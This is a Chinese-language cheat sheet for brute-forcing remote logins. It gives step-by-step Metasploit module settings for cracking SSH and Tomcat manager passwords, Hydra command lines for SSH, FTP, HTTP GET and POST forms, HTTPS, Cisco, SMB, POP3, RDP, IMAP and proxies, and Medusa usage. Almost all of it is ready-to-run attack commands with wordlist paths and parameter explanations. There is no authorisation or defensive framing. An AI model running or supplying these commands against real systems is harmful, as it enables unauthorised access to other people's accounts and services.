1.Metasploit:MSF破解ssh

msf:(全稱)metasploit freamwork使用命令: 破解ssh登錄名和密碼 msconsole回車search ssh 查找ssh相關的模塊

use auxiliary/scanner/ssh/ssh_login 調用ssh破解程序

show options 查看選項set rhosts 127.0.0.1 設置要破解的IP地址(必須能ping通)set rport 22 設置埠set username root 設置用戶名set pass_file /root/*.* 設置密碼文件set threads 50 設置線程50run 開始執行telnet同理,kali自帶密碼字典路徑//usr/share/wordlists/w3af.txt

註:所有路徑必須是絕對路徑

2.Hydra破解1、破解ssh:hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip sshhydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh2、破解ftp:hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vVhydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV3、get方式提交,破解web登錄:hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.PHP

4、post方式提交,破解web登錄:hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form 「/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password」 hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form 「login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>」(參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是採用http的post方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。)5、破解https:hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https6、破解teamspeak:hydra -l 用戶名 -P 密碼字典 -s 埠號 -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt 10.36.16.18 ciscohydra -m cloud -P pass.txt 10.36.16.18 cisco-enable8、破解smb:hydra -l administrator -P pass.txt 10.36.16.18 smb9、破解pop3:hydra -l muts -P pass.txt my.pop3.mail pop310、破解rdp:hydra ip rdp -l administrator -P pass.txt -V11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:hydra -L user.txt -p secret 10.36.16.18 imap PLAINhydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN參考網址:linuxde.net/2013/01/1143.Medusa暴力破解遠程 kali linux自帶破解工具,使用的時候要獲得一些必要的信息。 1、目標IP地址 2、登錄目標的一個用戶名或者一個用戶名文件(都是猜測的用戶名也可以說是用戶名字典) 3、密碼字典

4、要驗證的服務名稱(比如ssh、http、telnet等)

使用命令: medusa -h target_ip(攻擊ip) -u username -P path_to_passwordlist(密碼文件要打絕對路徑) -M authentication_service_to_attack(要驗證的服務名稱) -u是要攻擊的目標的id(用戶名)號,如果改為大寫的U,將會是利用用戶名列表進行攻擊,-M參數後面接的是你要攻擊的驗證服務名稱。參考網址:shangxueba.com/jingyan/4.payload破解search tomcat查看tomcat的payloadpayload就是載入模塊調用攻擊的有效載入項。(真心抽象)msfconsole回車use auxiliary/scanner/http/tomcat_mgr_login 調用tomcat破解程序

show options 查看選項

set rhosts 127.0.0.1 設置要破解的IP地址(必須能ping通)set rport 8080 設置埠set username root 設置用戶名(set user_file /*/*.*設置帳號字典)set pass_file /root/*.* 設置密碼字典set threads 50 設置線程50run 開始執行。註:所有路徑必須是絕對路徑。

推薦閱讀:

相關文章